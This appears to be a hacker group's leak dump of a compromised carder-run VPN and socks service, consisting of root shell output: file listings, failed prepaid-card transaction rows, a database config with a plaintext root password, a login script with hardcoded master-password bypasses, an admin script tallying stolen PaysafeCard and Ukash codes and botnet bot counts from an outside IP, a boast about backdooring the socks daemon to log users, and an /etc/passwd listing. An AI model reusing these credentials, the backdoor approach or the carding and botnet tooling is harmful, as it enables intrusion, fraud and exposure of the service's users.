11 07:33 21Kms__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Jan 3 18:07 5Liter__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 4 17:35 AtzePeng__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 1 10:29 BloodySunday__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 17 12:39 Delphinko__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 15 18:47 DieFliege__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 28 19:38 DingDong__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 15 13:59 Emrano__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 8 20:14 EsseX__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 6 20:22 Firewall__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Nov 20 11:18 HohesC__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 23 14:28 ICHICH__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 11 17:53 Janitor1__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Nov 27 14:04 KaLLi__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 5 12:17 Keineloe__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 10 17:26 Lognot__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 3 20:11 Maxim__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 1 14:35 MysticSun__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Nov 27 08:53 QuickSilver__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 24 01:01 Selfcut__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Nov 19 20:52 SlamD__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 18 14:05 Sparkasse__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 14 13:19 TheKing__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Jan 1 22:54 Tiberius1__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 23 15:04 WeArEoNe__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 13 10:02 __splittingError.htm -rw-r--r-- 1 www-data root 257 Nov 18 20:01 abo.php -rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_lu.php -rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_ru.php -rw-r--r-- 1 www-data root 4508 Nov 18 20:43 account.php -rw-r--r-- 1 www-data www-data 6412 Nov 14 07:33 analytics__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 18 12:36 andreas7411__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 16 11:40 asdfghjkl__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 9 10:37 b0uNz__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 15 17:38 b14ckf1ag__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 2 02:09 b2323__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 11 13:43 b7233__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 11 19:37 bLackftw1989__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 9 13:49 becks__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 12 15:42 beware__splittingError.htm -rw-r--r-- 1 www-data root 1209 Jan 26 2010 buy.php -rw-r--r-- 1 www-data www-data 6412 Dec 6 13:12 c4sh1__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 8 18:10 cardercarder__splittingError.htm drwxrwxrwx 3 www-data root 36864 Jan 7 18:38 cashIn -rw-r--r-- 1 www-data root 393 Nov 18 20:29 cashin.php -rw-r--r-- 1 root root 1291 Nov 18 19:05 check_one_vsocks5123213.php -rw-r--r-- 1 root root 2219 Nov 12 00:15 checkvsocks.php -rw-r--r-- 1 www-data www-data 6412 Nov 11 22:01 crack__splittingError.htm -rw-r--r-- 1 www-data www-data 1063 Dec 27 16:40 dbg.html -rw-r--r-- 1 www-data www-data 6412 Nov 21 15:48 djdalio__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 10 22:27 docscanner__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 17 14:41 duden__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 1 14:38 dudex__splittingError.htm -rw-r--r-- 1 www-data www-data 1063 Dec 27 16:11 dump.html -rw-r--r-- 1 www-data www-data 6412 Dec 3 13:45 enosaires__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Nov 30 11:16 epoepo__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 20 19:41 erebos1337__splittingError.htm -rw-r--r-- 1 www-data root 311 Nov 18 20:21 faq.php -rw-r--r-- 1 root root 1406 Nov 18 23:11 favicon.ico -rw-r--r-- 1 www-data www-data 6412 Dec 14 13:24 frankylo__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 14 16:48 fuckdawn__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 24 16:14 hackbart2__splittingError.htm -rw-r--r-- 1 root root 967 Aug 3 19:00 handleVsocks.php -rw-r--r-- 1 www-data www-data 6412 Dec 13 00:18 hans2000__splittingError.htm -rw-r--r-- 1 root root 56 May 11 2010 hdf2.php -rw-r--r-- 1 www-data root 1064 Jul 17 14:33 header.php -rw-r--r-- 1 root root 950 Nov 18 21:54 header2.php -rw-r--r-- 1 www-data www-data 6412 Dec 13 15:32 hexst4tic__splittingError.htm -rw-r--r-- 1 www-data root 1380 Aug 23 01:44 home.php -rw-r--r-- 1 root root 178 Nov 15 18:01 home2.php -rw-r--r-- 1 www-data www-data 6412 Nov 9 20:00 hund123456__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 22 18:04 iKas2__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 7 19:15 iiyama__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 13 10:08 ikarus22__splittingError.htm drwxr-xr-x 2 www-data root 4096 Nov 4 21:36 images drwxr-xr-x 2 root root 4096 Nov 18 21:45 images2 -rw-r--r-- 1 root root 10646 Nov 18 23:16 index.php -rw-r--r-- 1 root root 4299 Nov 18 21:26 indexORIGINALbss213123123.php -rw-r--r-- 1 www-data www-data 6411 Nov 16 15:37 jensmaul__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 15 19:51 joeee__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Nov 17 21:01 jojo187__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 15 23:53 jojoman__splittingError.htm -rw-r--r-- 1 www-data www-data 4853 Nov 23 15:15 juicestin__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Nov 24 20:33 juliasutter__splittingError.htm -rw-r--r-- 1 www-data www-data 6515 Dec 1 23:49 kackpfosten__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 17 20:07 keystyle__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 8 14:21 kirmi__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Nov 10 18:42 klaudio__splittingError.htm drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 koksundnuTTen88 -rw-r--r-- 1 www-data www-data 6411 Dec 14 13:32 kucke17__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 10 05:37 latestnews__splittingError.htm -rw-r--r-- 1 root root 156 Nov 18 19:10 listallvsocks62342134543.php -rw-r--r-- 1 www-data root 1421 May 9 2010 listssh.php -rw-r--r-- 1 www-data root 1781 Nov 18 20:28 listvpn.php -rw-r--r-- 1 root root 1245 May 15 2010 loadssh.php -rw-r--r-- 1 www-data www-data 1630 May 6 2010 login.php -rw-r--r-- 1 root root 7442 Nov 18 20:27 lu_abo.php -rw-r--r-- 1 root root 1274 Nov 4 21:05 lu_loadssh.php -rw-r--r-- 1 root root 3126 Nov 18 20:17 lu_socks5.php -rw-r--r-- 1 www-data www-data 6412 Jan 3 16:19 magi007__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 23 21:56 makko__splittingError.htm drwxr-xr-x 2 root root 4096 Dec 23 12:15 moneystream -rw-r--r-- 1 www-data root 182 May 10 2010 mysql.php -rw-r--r-- 1 root root 3879 Nov 18 20:27 newProxie.php -rw-r--r-- 1 www-data root 596 Nov 18 20:07 news.php -rw-r--r-- 1 www-data root 362 May 6 2010 news_overview.php -rw-r--r-- 1 root root 380 Nov 15 17:58 news_overview2.php -rw-r--r-- 1 www-data www-data 6412 Nov 18 12:24 nitex__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 14 19:08 offlinejack__splittingError.htm drwxr-xr-x 2 www-data root 36864 Jan 7 19:58 ovpn -rw-r--r-- 1 www-data www-data 6412 Dec 7 19:56 pablo__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 10 20:04 pan1c__splittingError.htm -rw-r--r-- 1 www-data www-data 6512 Dec 7 22:57 pappe223__splittingError.htm -rw-r--r-- 1 root root 1326 Aug 24 19:30 poll.php -rw-r--r-- 1 www-data www-data 6411 Dec 14 14:07 pscBastard__splittingError.htm -rw-r--r-- 1 root root 256 Sep 13 16:27 pscashin.php -rw-r--r-- 1 www-data www-data 6409 Jan 7 23:47 pwnny__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 19 19:59 pyrodeath__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 14 16:24 qqqqqq__splittingError.htm -rw-r--r-- 1 www-data root 2817 Nov 18 22:46 register.php -rw-r--r-- 1 www-data www-data 6412 Dec 29 17:02 reideen__splittingError.htm -rw-r--r-- 1 root root 7157 Nov 18 20:26 ru_abo.php -rw-r--r-- 1 root root 1262 Nov 4 21:05 ru_loadssh.php -rw-r--r-- 1 root root 3025 Nov 18 20:16 ru_socks5.php -rw-r--r-- 1 www-data root 1196 Nov 24 17:32 saveReq.php -rw-r--r-- 1 www-data root 5125 Aug 29 16:29 shop.php -rw-r--r-- 1 www-data www-data 6412 Dec 10 14:33 shore__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 3 20:35 slic3menic3__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 15 22:18 snowghost__splittingError.htm -rw-r--r-- 1 www-data root 263 Nov 18 20:16 socks5.php -rw-r--r-- 1 root root 574 Oct 7 18:54 socksdetails.php -rw-r--r-- 1 www-data www-data 6412 Nov 9 16:10 spran__splittingError.htm -rw-r--r-- 1 www-data root 3104 Nov 18 20:20 styles.css drwxr-xr-x 2 root root 4096 Oct 21 18:25 suPPortPanel18 -rw-r--r-- 1 www-data www-data 6412 Dec 23 16:07 sunrise__splittingError.htm -rw-r--r-- 1 www-data root 1336 Nov 18 20:53 support.php -rw-r--r-- 1 www-data www-data 6412 Jan 2 16:36 test569__splittingError.htm -rw-r--r-- 1 root root 171 May 12 2010 time.php -rw-r--r-- 1 www-data www-data 6412 Nov 11 18:38 traden90__splittingError.htm -rw-r--r-- 1 root root 139 Dec 28 14:21 ukashin.php -rw-r--r-- 1 root root 2118 Nov 18 20:25 uvsocks.php -rw-r--r-- 1 www-data www-data 6412 Dec 15 07:03 vpn24__splittingError.htm -rw-r--r-- 1 www-data root 799 May 6 2010 vsocks.php -rw-r--r-- 1 www-data www-data 6412 Dec 28 14:25 w333d__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 14 17:17 winkel72__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 8 12:53 xc0re__splittingError.htm -rw-r--r-- 1 www-data www-data 6412 Dec 11 11:52 xxx3xxx4__splittingError.htm -rw-r--r-- 1 www-data www-data 6411 Dec 4 16:45 zezol__splittingError.htm # cat *splittingError.htm | grep "Failed</td>" <tr><td>6337180255464896366</td><td>Failed</td><td>100.00</td></tr> <tr><td>6337180253212809062</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180252076434686</td><td>Failed</td><td>20.00</td></tr> <tr><td>6337180253299398565</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180257214002899</td><td>Failed</td><td>3.00</td></tr> <tr><td>6337180259183915580</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180252532009429</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180250390679390</td><td>Failed</td><td>5.00</td></tr> <tr><td>6330949130319304248</td><td>Failed</td><td>30.00</td></tr> <tr><td>6337180259379552429</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180258343754368</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180256917976433</td><td>Failed</td><td>2.14</td></tr> <tr><td>6337180251009203952</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180111553585578</td><td>Failed</td><td>4.00</td></tr> <tr><td>6337180258177204589</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180253681177082</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180259073857611</td><td>Failed</td><td>3.00</td></tr> <tr><td>6337180256462965609</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180394582246475</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180258243666274</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180256212540975</td><td>Failed</td><td>50.00</td></tr> <tr><td>6337180257735545855</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180250238018710</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180250936554560</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180258032831998</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180113239640306</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180259568330264</td><td>Failed</td><td>50.00</td></tr> <tr><td>6337180254636279981</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180255605913872</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180251576728091</td><td>Failed</td><td>20.00</td></tr> <tr><td>6337180254761736029</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180251140051070</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180258955781559</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180255901612889</td><td>Failed</td><td>20.00</td></tr> <tr><td>6337180252316842391</td><td>Failed</td><td>20.00</td></tr> <tr><td>6337180255645832702</td><td>Failed</td><td>50.00</td></tr> <tr><td>6337180253814896822</td><td>Failed</td><td>10.00</td></tr> <tr><td>6330302815447899096</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180119686732454</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180253644660265</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180257110264619</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180254730527152</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180259238856011</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180280592431563</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180253125392792</td><td>Failed</td><td>15.00</td></tr> <tr><td>6337180258269992836</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180253244887904</td><td>Failed</td><td>20.00</td></tr> <tr><td>6337180258751189123</td><td>Failed</td><td>10.00</td></tr> <tr><td>6637180305761777189</td><td>Failed</td><td>25.00</td></tr> <tr><td>6337180250114063863</td><td>Failed</td><td>15.00</td></tr> <tr><td>6337180251763555456</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180250613878779</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180258831608324</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180254951300131</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180251480953489</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180257200821070</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180252910471233</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180250992167067</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180113591950418</td><td>Failed</td><td>5.92</td></tr> <tr><td>6337180253935682366</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180254837540264</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180251213933840</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180253734200352</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180257051176442</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180259341246183</td><td>Failed</td><td>2.00</td></tr> <tr><td>6337180250165411383</td><td>Failed</td><td>10.00</td></tr> <tr><td>6332347911381552324</td><td>Failed</td><td>2.00</td></tr> <tr><td>6337180254171009637</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180250833220976</td><td>Failed</td><td>15.00</td></tr> <tr><td>6337180258930519133</td><td>Failed</td><td>5.00</td></tr> <tr><td>6337180253725306614</td><td>Failed</td><td>1.30</td></tr> <tr><td>7180254095966078633</td><td>Failed</td><td>20.00</td></tr> <tr><td>6337180258930519133</td><td>Failed</td><td>6.44</td></tr> <tr><td>6337180255646619421</td><td>Failed</td><td>20.00</td></tr> <tr><td>6637180250951262628</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180255706618537</td><td>Failed</td><td>10.00</td></tr> <tr><td>6331780259351713338</td><td>Failed</td><td>20.00</td></tr> <tr><td>6337180251207309429</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180251260723060</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180254766958230</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180251903818657</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180254440921646</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180256430792556</td><td>Failed</td><td>15.00</td></tr> <tr><td>6337180256307519041</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180251553897605</td><td>Failed</td><td>20.00</td></tr> <tr><td>6337180256373444637</td><td>Failed</td><td>10.00</td></tr> <tr><td>6337180114065134794</td><td>Failed</td><td>8.00</td></tr> # cat mysql.php <?php $server = "localhost"; $user = "root"; $pass = "QkZorIZZC5e"; $database = "vpn24"; mysql_connect($server,$user,$pass); if(!$install) mysql_select_db($database); ?> # crazy fuckin masterpassword^C # cat login.php <?php if(isset($_SESSION['cmuser'])) echo("<div style=''>Sie sind bereits eingeloggt als ".$_SESSION['cmuser']."</div>"); else if(isset($_POST['log'])) { $user = mysql_real_escape_string($_POST['user']); $pass = mysql_real_escape_string($_POST['pass']); if($pass == "koksundnuTTen88" || $pass == "suPPort_masterPass88") $res = mysql_query("SELECT * FROM cmuser WHERE name='$user'"); else $res = mysql_query("SELECT * FROM cmuser WHERE name='$user' AND pass='".md5($pass)."'"); $arr = mysql_fetch_array($res); if(mysql_num_rows($res) == 0) die("<div style=''>Konnte dieses User/Passwort Paar nicht finden</div>"); $_SESSION['cmuser'] = $arr['name']; $_SESSION['cmid'] = $arr['id']; $_SESSION['cmpass'] = md5($pass); $_SESSION['pPass'] = $arr['privPass']; $_SESSION['pUser'] = $arr['privUser']; $_SESSION['poll'] = $arr['poll']; echo("<div style=''>Sie sind nun eingeloggt als <b>".$_SESSION['cmuser']."</b></div>"); } else { echo <<< END <div style=""> <div style="font-weight:bold;font-size:1.7em;">Login</div> <table> <form action="index.php?do=login" method="post"> <tr> <td>User:</td><td><input class="cInp" type="text" name="user"></td> </tr> <tr> <td>Pass:</td><td><input class="cInp" type="password" name="pass"></td> </tr> <br> </table><br> <input type="submit" name="log" value="Einloggen"> </form> <br><br> Noch keinen Account? Gleich <a href="index.php?do=register">registrieren</a> </div> END; } ?> # tar cvjf /tmp/cashin.tar.bz2 cashIn/*.php cashIn/eeeeeeeeee.php cashIn/myOne.php cashIn/myukashcombine.php cashIn/oldPSC.php cashIn/psc.php cashIn/ukash666.php cashIn/ukash_convert666.php # cd koksundnuTTen88/ && ls -la total 152 drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 . drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 .. -rw-r--r-- 1 root root 1112 Nov 7 16:29 add5daysadsdsadsayfdsa.php -rw-r--r-- 1 root root 511 Nov 13 12:48 asd21938uasd213dsa.php -rw-r--r-- 1 root root 483 Aug 28 02:27 deletevsdata.php -rw-r--r-- 1 root root 78 Nov 10 20:19 deletevsdata_noreset.php -rw-r--r-- 1 root root 508 Aug 28 02:45 getAUserCreditsBack.php -rw-r--r-- 1 root root 235 Jun 25 2010 getSocksUserWithoutAbo.php -rw-r--r-- 1 root root 441 Jun 28 2010 getVPNUserWithoutAbo.php -rw-r--r-- 1 root root 14 Jul 10 19:58 index.html -rw-r--r-- 1 root root 724 Aug 9 17:43 insertShop.php -rw-r--r-- 1 root root 450 Nov 4 20:29 lu_getVPNUserWithoutAbo.php -rw-r--r-- 1 root root 5255 Nov 9 20:43 psc.php -rw-r--r-- 1 www-data root 101 May 7 2010 style.css -rw-r--r-- 1 www-data root 1924 May 7 2010 viewSupport.php -rw-r--r-- 1 root root 2021 Nov 9 20:42 viewVsocksSupport.php # cat psc.php <?php include("../mysql.php"); $res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM pscs WHERE pass != '.'") or die(mysql_error()); $arr = mysql_fetch_array($res); echo "Es sind <b>".$arr['ci']."</b> PaysafeCards im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>"; $res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM ukash") or die(mysql_error()); $arr = mysql_fetch_array($res); echo "Es sind <b>".$arr['ci']."</b> UkashCodes im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>"; $res = mysql_query("SELECT SUM(credits) AS sc,COUNT(id) AS ci FROM cmuser WHERE id > 26"); $arr = mysql_fetch_array($res); echo "Es sind <b>".$arr['ci']."</b> User registriert welche noch <b>".$arr['sc']." Euro</b> an Credits haben<br>"; // socksAcces vpnAccess $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE socksAcces > ".time(0)); $arr = mysql_fetch_array($res); echo " <u>Abos:</u> <b>".$arr['ci']."</b> Socks5"; $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE vpnAccess > ".time(0)); $arr = mysql_fetch_array($res); echo " / <b>".$arr['ci']."</b> OpenVPN<br><br>"; $res = mysql_query("SELECT COUNT(id) AS ci FROM support WHERE seen = 0"); $arr = mysql_fetch_array($res); echo "<a style='text-decoration:none;' href='viewSupport.php'>Offene Support Tickets</a>: <b>".$arr['ci']."</b><br>"; $res = mysql_query("SELECT COUNT(id) AS ci FROM vsockssupport WHERE seen = 0"); $arr = mysql_fetch_array($res); echo "<a style='text-decoration:none;' href='viewVsocksSupport.php'>Vicsocks Lebensanzeige</a>: <b>".$arr['ci']."</b><br><br>"; $res = mysql_query("SELECT SUM(wert) AS ge FROM pscs WHERE pass = '.'"); $arr = mysql_fetch_array($res); $gesEarned = $arr['ge']; $res = mysql_query("SELECT SUM(yesterday) AS ge FROM statistik"); $arr = mysql_fetch_array($res); $gesEarnedYes = $arr['ge']; $res = mysql_query("SELECT SUM(db_yesterday) AS ge FROM statistik"); $arr = mysql_fetch_array($res); $gesEarnedDBYes = $arr['ge']; echo "<span style='color:lime;'><b>Gesamt verdient: $gesEarned (Heute: ".($gesEarned-$gesEarnedYes)." / Gestern: ".($gesEarnedYes-$gesEarnedDBYes).")<br></b></span>"; $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT'"); $arr = mysql_fetch_array($res); echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> für VicSocks ausgegeben "; $earned = floatval($arr['wert']); $res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='vsocks'"); $arr = mysql_fetch_array($res); $yest = floatval($arr['yesterday']); $db_yest = floatval($arr['db_yesterday']); echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>"; $res = mysql_query("SELECT COUNT(id) AS ci FROM vsocksData"); $arr = mysql_fetch_array($res); $fp = fopen("http://77.91.225.188/asdSDAFqwe1324.php","r"); $conN = fgets($fp,2048); fclose($fp); $fp = fopen("http://77.91.225.188/asdSDAFqwe13372.php","r"); $conN2 = fgets($fp,2048); fclose($fp); echo " <u>DE Bots:</u> <b>".$arr['ci']."</b> aktiv / <b>".$conN."</b> verfügbar / <b>".$conN2."</b> im Netz <br>"; echo "<br>"; $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT2'"); $arr = mysql_fetch_array($res); echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> im Shop ausgegeben "; $earned = floatval($arr['wert']); $res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='shop'"); $arr = mysql_fetch_array($res); $yest = floatval($arr['yesterday']); $db_yest = floatval($arr['db_yesterday']); echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>"; echo "<b>Noch verfügbar:</b><br>"; $res = mysql_query("SELECT * FROM shopLayout ORDER BY id"); while($arr = mysql_fetch_array($res)) { $res2 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."' AND buyer = ''"); $res3 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."'"); echo " <b>".mysql_num_rows($res2)."</b>/".mysql_num_rows($res3)." '".$arr['text']."'<br>"; } echo "<br>"; $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1 OR poll=2 OR poll=3"); $arr = mysql_fetch_array($res); echo "Es haben <b>".$arr['ci']."</b> User an der Umfrage teilgenommen<br>"; echo " <u>Stimmen:</u> "; $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1");$arr = mysql_fetch_array($res); echo "<b>".$arr['ci']."</b> Lux&Hun / "; $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=2");$arr = mysql_fetch_array($res); echo "<b>".$arr['ci']."</b> Lux&Off / "; $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=3");$arr = mysql_fetch_array($res); echo "<b>".$arr['ci']."</b> Hun&Off<br>"; ?> ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | Was bieten Sie an? | | Wir bieten 100% logfreie, sichere und absolut anonyme VPN, SSH | | Socks und Socks 5 Zugänge in Russland. | | | | Wieso kann ich mir so sicher sein dass die Anonymisierung über | | VPN24 100% logfrei und sicher ist? | | Wir haben viele Erfahrungen gesammelt da der Service seit | | 22.12.2009 existiert und er ein offizielles Projekt vom carders.cc| | Team ist. Wir mieten nur Dedizierte Server bei Anbietern bei denen| | wir auch zu 100% sicher sind dass diese nicht mit der Polizei | | kooperieren (deswegen bieten wir als Location erstmal nur Russland| | an, weitere Locations werden folgen). Außerdem sind die Server | | 2-fach verschlüsselt und wie schon erwähnt komplett Logfrei. | |____________________________________________________________________| Alright. So we tapped into your russian VPN- and socksserver and shat brix when looking at your two-times encrypted server. What kind of mad algorithm from the future are you using? No, lemme guess, AES-0? On top of that we unfortunately had to reduce the amount of "non-logging" to about 0% when backdooring your sockd to log http-headers; strangely, no AES-1337 here either. This gave us a nice round-up of the people using (and administrating) it and we can't say it was a surprise. Therefore you find gigabytes of http- and IPlogs neatly packed and enclosed with the backup. # uname -a Linux vpnsocks 2.6.18-194.26.1.el5.028stab070.14 #1 SMP Thu Nov 18 16:34:01 MSK 2010 x86_64 GNU/Linux # id uid=0(root) gid=0(root) # cat /etc/issue Debian GNU/Linux 5.0 \n \l # cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh bind:x:101:104::/var/cache/bind:/bin/false fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin stunnel4:x:104:106::/var/run/stunnel4:/bin/false smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false USgK1k659d:x:1000:1000::/home/SSHUSER:/usr/sbin/nologin vpn24socks:x:1004:1004::/home/vpn24socks:/bin/false 2ee2JLMeiD:x:1005:1005::/home/SSHUSER:/usr/sbin/nologin jguv7VJ6ii:x:1010:1010::/home/SSHUSER:/usr/sbin/nologin sOxNXOP2PV:x:1011:1011::/home/SSHUSER:/usr/sbin/nologin IlE6hFCCQ9:x:1016:1016::/home/SSHUSER:/usr/sbin/nologin gxCDRFriLl:x:1017:1017::/home/SSHUSER:/usr/sbin/nologin BulLYDNolq:x:1018:1018::/home/SSHUSER:/usr/sbin/nologin cEzN80h8BB:x:1020:1020::/home/SSHUSER:/usr/sbin/nologin 